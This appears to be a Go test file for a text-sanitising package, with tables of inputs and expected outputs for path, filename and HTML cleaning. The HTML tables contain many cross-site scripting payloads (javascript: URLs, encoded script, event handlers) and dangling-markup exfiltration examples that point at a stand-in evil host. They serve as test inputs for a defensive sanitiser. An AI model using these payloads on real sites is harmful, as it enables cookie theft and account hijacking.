You cannot select more than 25 topics. Topics must start with a letter or number, can include dashes ('-'), and can be up to 35 characters long.
 
 
 

234 lines
11 KiB

  1. // Package sanitize provides utility functions for working with text.
  2. package sanitize
  3. import (
  4. "testing"
  5. )
  // Format is the failure-message template shared by the tests in this file.
  // Its three %q verbs receive, in order, the input, the expected value and
  // the actual output.
  var Format = "\ninput: %q" +
  	"\nexpected: %q" +
  	"\noutput: %q"
  // Test is a single table-driven case: the string handed to the function
  // under test and the string it is expected to produce.
  type Test struct {
  	input, expected string
  }
  11. // NB the treatment of accents - they are removed and replaced with ascii transliterations
  12. var urls = []Test{
  13. {"ReAd ME.md", `read-me.md`},
  14. {"E88E08A7-279C-4CC1-8B90-86DE0D7044_3C.html", `e88e08a7-279c-4cc1-8b90-86de0d7044-3c.html`},
  15. {"/user/test/I am a long url's_-?ASDF@£$%£%^testé.html", `/user/test/i-am-a-long-urls-asdfteste.html`},
  16. {"/../../4-icon.jpg", `/4-icon.jpg`},
  17. {"/Images_dir/../4-icon.jpg", `/images-dir/4-icon.jpg`},
  18. {"../4 icon.*", `/4-icon.`},
  19. {"Spac ey/Nôm/test før url", `spac-ey/nom/test-foer-url`},
  20. {"../*", `/`},
  21. }
  22. func TestPath(t *testing.T) {
  23. for _, test := range urls {
  24. output := Path(test.input)
  25. if output != test.expected {
  26. t.Fatalf(Format, test.input, test.expected, output)
  27. }
  28. }
  29. }
  30. func BenchmarkPath(b *testing.B) {
  31. for i := 0; i < b.N; i++ {
  32. for _, test := range urls {
  33. output := Path(test.input)
  34. if output != test.expected {
  35. b.Fatalf(Format, test.input, test.expected, output)
  36. }
  37. }
  38. }
  39. }
  40. var fileNames = []Test{
  41. {"ReAd ME.md", `read-me.md`},
  42. {"/var/etc/jobs/go/go/src/pkg/foo/bar.go", `bar.go`},
  43. {"I am a long url's_-?ASDF@£$%£%^é.html", `i-am-a-long-urls-asdfe.html`},
  44. {"/../../4-icon.jpg", `4-icon.jpg`},
  45. {"/Images/../4-icon.jpg", `4-icon.jpg`},
  46. {"../4 icon.jpg", `4-icon.jpg`},
  47. {"../4 icon-testé *8%^\"'\".jpg ", `4-icon-teste-8.jpg`},
  48. }
  49. func TestName(t *testing.T) {
  50. for _, test := range fileNames {
  51. output := Name(test.input)
  52. if output != test.expected {
  53. t.Fatalf(Format, test.input, test.expected, output)
  54. }
  55. }
  56. }
  57. func BenchmarkName(b *testing.B) {
  58. for i := 0; i < b.N; i++ {
  59. for _, test := range fileNames {
  60. output := Name(test.input)
  61. if output != test.expected {
  62. b.Fatalf(Format, test.input, test.expected, output)
  63. }
  64. }
  65. }
  66. }
  67. var baseFileNames = []Test{
  68. {"The power & the Glory jpg file. The end", `The-power-the-Glory-jpg-file-The-end`},
  69. {"/../../4-iCoN.jpg", `-4-iCoN-jpg`},
  70. {"And/Or", `And-Or`},
  71. {"Sonic.EXE", `Sonic-EXE`},
  72. {"012: #Fetch for Defaults", `012-Fetch-for-Defaults`},
  73. }
  74. func TestBaseName(t *testing.T) {
  75. for _, test := range baseFileNames {
  76. output := BaseName(test.input)
  77. if output != test.expected {
  78. t.Fatalf(Format, test.input, test.expected, output)
  79. }
  80. }
  81. }
  82. // htmlTests holds the cases run through HTML by TestHTML, including malformed or malicious html.
  83. // NB because we remove all tokens after a < until the next >
  84. // and do not attempt to parse, we should be safe from invalid html,
  85. // but invalid input will sometimes leave the string completely empty.
  86. // Note some cases use double-quoted strings, so escapes keep them on one line and the backtick character can be used.
  87. var htmlTests = []Test{
  88. {`&nbsp;`, " "},
  89. {`&amp;#x000D;`, `&amp;#x000D;`},
  90. {`<invalid attr="invalid"<,<p><p><p><p><p>`, ``},
  91. {"<b><p>Bold </b> Not bold</p>\nAlso not bold.", "Bold Not bold\nAlso not bold."},
  92. {`FOO&#x000D;ZOO`, "FOO\rZOO"},
  93. {`<script><!--<script </s`, ``},
  94. {`<a href="/" alt="Fab.com | Aqua Paper Map 22"" title="Fab.com | Aqua Paper Map 22" - fab.com">test</a>`, `test`},
  95. {`<p</p>?> or <p id=0</p> or <<</>><ASDF><@$!@£M<<>>>>>>>>>>>>>><>***************aaaaaaaaaaaaaaaaaaaaaaaaaa>`, ` or ***************aaaaaaaaaaaaaaaaaaaaaaaaaa`},
  96. {`<p>Some text</p><frameset src="testing.html"></frameset>`, "Some text\n"},
  97. {`Something<br/>Some more`, "Something\nSome more"},
  98. {`<a href="http://www.example.com"?>This is a 'test' of <b>bold</b> &amp; <i>italic</i></a> <br/> invalid markup.<//data>><alert><script CDATA[:Asdfjk2354115nkjafdgs]>. <div src=">">><><img src="">`, "This is a 'test' of bold & italic \n invalid markup.. \""},
  99. {`<![CDATA[<sender>John Smith</sender>]]>`, `John Smith]]`},
  100. {`<!-- <script src='blah.js' data-rel='fsd'> --> This is text`, ` -- This is text`},
  101. {`<style>body{background-image:url(http://www.google.com/intl/en/images/logo.gif);}</style>`, `body{background-image:url(http://www.google.com/intl/en/images/logo.gif);}`},
  102. {`&lt;iframe src="" attr=""&gt;>>>>>`, `&lt;iframe src="" attr=""&gt;`},
  103. {`<IMG """><SCRIPT>alert("XSS")</SCRIPT>">`, `alert("XSS")"`},
  104. {`<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>`, ``},
  105. {`<IMG SRC=JaVaScRiPt:alert('XSS')&gt;`, ``},
  106. {`<IMG SRC="javascript:alert('XSS')" <test`, ``},
  107. {`<a href="javascript:alert('XSS')" src="javascript:alert('XSS')" onclick="javascript:alert('XSS')"></a>`, ``},
  108. {`&gt & test &lt`, `&gt; & test &lt;`},
  109. {`<img></IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>`, ``},
  110. {`&#8220;hello&#8221; it&#8217;s for &#8216;real&#8217;`, `"hello" it's for 'real'`},
  111. {`<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
  112. #0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>`, ``},
  113. {`'';!--"<XSS>=&{()}`, `'';!--"=&amp;{()}`},
  114. {"LINE 1<br />\nLINE 2", "LINE 1\nLINE 2"},
  115. // Examples from https://githubengineering.com/githubs-post-csp-journey/
  116. {`<img src='https://example.com/log_csrf?html=`, ``},
  117. {`<img src='https://example.com/log_csrf?html=
  118. <form action="https://example.com/account/public_keys/19023812091023">
  119. ...
  120. <input type="hidden" name="csrf_token" value="some_csrf_token_value">
  121. </form>`, `...`},
  122. {`<img src='https://example.com?d=https%3A%2F%2Fsome-evil-site.com%2Fimages%2Favatar.jpg%2f
  123. <p>secret</p>`, `secret
  124. `},
  125. {`<form action="https://some-evil-site.com"><button>Click</button><textarea name='
  126. <!-- </textarea> --><!-- '" -->
  127. <form action="/logout">
  128. <input name="authenticity_token" type="hidden" value="secret1">
  129. </form>`, `Click -- `},
  130. }
  131. func TestHTML(t *testing.T) {
  132. for _, test := range htmlTests {
  133. output := HTML(test.input)
  134. if output != test.expected {
  135. t.Fatalf(Format, test.input, test.expected, output)
  136. }
  137. }
  138. }
  // htmlTestsAllowing holds the cases run through HTMLAllowing by TestHTMLAllowed and BenchmarkHTMLAllowed.
  139. var htmlTestsAllowing = []Test{
  140. {`<IMG SRC="jav&#x0D;ascript:alert('XSS');">`, `<img>`},
  141. {`<i>hello world</i href="javascript:alert('hello world')">`, `<i>hello world</i>`},
  142. {`hello<br ><br / ><hr /><hr >rulers`, `hello<br><br><hr/><hr>rulers`},
  143. {`<span class="testing" id="testid" name="testname" style="font-color:red;text-size:gigantic;"><p>Span</p></span>`, `<span class="testing" id="testid" name="testname"><p>Span</p></span>`},
  144. {`<div class="divclass">Div</div><h4><h3>test</h4>invalid</h3><p>test</p>`, `<div class="divclass">Div</div><h4><h3>test</h4>invalid</h3><p>test</p>`},
  145. {`<p>Some text</p><exotic><iframe>test</iframe><frameset src="testing.html"></frameset>`, `<p>Some text</p>`},
  146. {`<b>hello world</b>`, `<b>hello world</b>`},
  147. {`text<p>inside<p onclick='alert()'/>too`, `text<p>inside<p/>too`},
  148. {`&amp;#x000D;`, `&amp;#x000D;`},
  149. {`<invalid attr="invalid"<,<p><p><p><p><p>`, `<p><p><p><p>`},
  150. {"<b><p>Bold </b> Not bold</p>\nAlso not bold.", "<b><p>Bold </b> Not bold</p>\nAlso not bold."},
  151. {"`FOO&#x000D;ZOO", "`FOO&#13;ZOO"},
  152. {`<script><!--<script </s`, ``},
  153. {`<a href="/" alt="Fab.com | Aqua Paper Map 22"" title="Fab.com | Aqua Paper Map 22" - fab.com">test</a>`, `<a href="/" alt="Fab.com | Aqua Paper Map 22" title="Fab.com | Aqua Paper Map 22">test</a>`},
  154. {"<p</p>?> or <p id=0</p> or <<</>><ASDF><@$!@£M<<>>>>>>>>>>>>>><>***************aaaaaaaaaaaaaaaaaaaaaaaaaa>", "?&gt; or <p id=\"0&lt;/p\"> or &lt;&lt;&gt;&lt;@$!@£M&lt;&lt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&lt;&gt;***************aaaaaaaaaaaaaaaaaaaaaaaaaa&gt;"},
  155. {`<p>Some text</p><exotic><iframe><frameset src="testing.html"></frameset>`, `<p>Some text</p>`},
  156. {"Something<br/>Some more", `Something<br/>Some more`},
  157. {`<a href="http://www.example.com"?>This is a 'test' of <b>bold</b> &amp; <i>italic</i></a> <br/> invalid markup.</data><alert><script CDATA[:Asdfjk2354115nkjafdgs]>. <div src=">escape;inside script tag"><img src="">`, `<a href="http://www.example.com">This is a &#39;test&#39; of <b>bold</b> &amp; <i>italic</i></a> <br/> invalid markup.`},
  158. {"<sender ignore=me>John Smith</sender>", `John Smith`},
  159. {"<!-- <script src='blah.js' data-rel='fsd'> --> This is text", ` This is text`},
  160. {"<style>body{background-image:url(http://www.google.com/intl/en/images/logo.gif);}</style>", ``},
  161. {`&lt;iframe src="" attr=""&gt;`, `&lt;iframe src=&#34;&#34; attr=&#34;&#34;&gt;`},
  162. {`<IMG """><SCRIPT>alert("XSS")</SCRIPT>">`, `<img>&#34;&gt;`},
  163. {`<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>`, `<img>`},
  164. {`<IMG SRC=JaVaScRiPt:alert('XSS')&gt;`, ``},
  165. {`<IMG SRC="javascript:alert('XSS')">>> <test`, `<img>&gt;&gt; `},
  166. {`&gt & test &lt`, `&gt; &amp; test &lt;`},
  167. {`<img></IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>`, `<img></img>`},
  168. {`<img src="data:text/javascript;alert('alert');">`, `<img>`},
  169. {`<iframe src=http://... <`, ``},
  170. {`<iframe src="data:CSS"><img><a><</a>;sdf<iframe>`, ``},
  171. {`<img src=javascript:alert(document.cookie)>`, `<img>`},
  172. {`<?php echo('hello world')>`, ``},
  173. {`Hello <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>World`, `Hello <a class="XSS"></a>World`},
  174. {`<a href="javascript:alert('XSS1')" onmouseover="alert('XSS2')">XSS<a>`, `<a>XSS<a>`},
  175. {`<a href="http://www.google.com/"><img src="https://ssl.gstatic.com/accounts/ui/logo_2x.png"/></a>`,
  176. `<a href="http://www.google.com/"><img src="https://ssl.gstatic.com/accounts/ui/logo_2x.png"/></a>`},
  177. {`<a href="javascript:alert(&#39;XSS1&#39;)" "document.write('<HTML> Tags and markup');">XSS<a>`, `<a> Tags and markup&#39;);&#34;&gt;XSS<a>`},
  178. {`<a <script>document.write("UNTRUSTED INPUT: " + document.location.hash);<script/> >`, `<a>document.write(&#34;UNTRUSTED INPUT: &#34; + document.location.hash); &gt;`},
  179. {`<a href="#anchor">foo</a>`, `<a href="#anchor">foo</a>`},
  180. {`<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>`, `<img>`},
  181. {`<IMG SRC="jav ascript:alert('XSS');">`, `<img>`},
  182. {`<IMG SRC="jav&#x09;ascript:alert('XSS');">`, `<img>`},
  183. {`<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-`, ` +ADw-SCRIPT+AD4-alert(&#39;XSS&#39;);+ADw-/SCRIPT+AD4-`},
  184. {`<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>`, `PT SRC=&#34;http://ha.ckers.org/xss.js&#34;&gt;`},
  185. {`<a href="javascript:alert('XSS')" src="javascript:alert('XSS')" onclick="javascript:alert('XSS')"></a>`, `<a></a>`},
  186. {`'';!--"<XSS>=&{()}`, `&#39;&#39;;!--&#34;=&amp;{()}`},
  187. {`<IMG SRC=javascript:alert('XSS')`, ``},
  188. {`<IMG """><SCRIPT>alert("XSS")</SCRIPT>">`, `<img>&#34;&gt;`},
  189. {`<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
  190. #0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>`, `<img>`},
  191. }
  192. func TestHTMLAllowed(t *testing.T) {
  193. for _, test := range htmlTestsAllowing {
  194. output, err := HTMLAllowing(test.input)
  195. if err != nil {
  196. t.Fatalf(Format, test.input, test.expected, output, err)
  197. }
  198. if output != test.expected {
  199. t.Fatalf(Format, test.input, test.expected, output)
  200. }
  201. }
  202. }
  203. func BenchmarkHTMLAllowed(b *testing.B) {
  204. for i := 0; i < b.N; i++ {
  205. for _, test := range htmlTestsAllowing {
  206. output, err := HTMLAllowing(test.input)
  207. if err != nil {
  208. b.Fatalf(Format, test.input, test.expected, output, err)
  209. }
  210. if output != test.expected {
  211. b.Fatalf(Format, test.input, test.expected, output)
  212. }
  213. }
  214. }
  215. }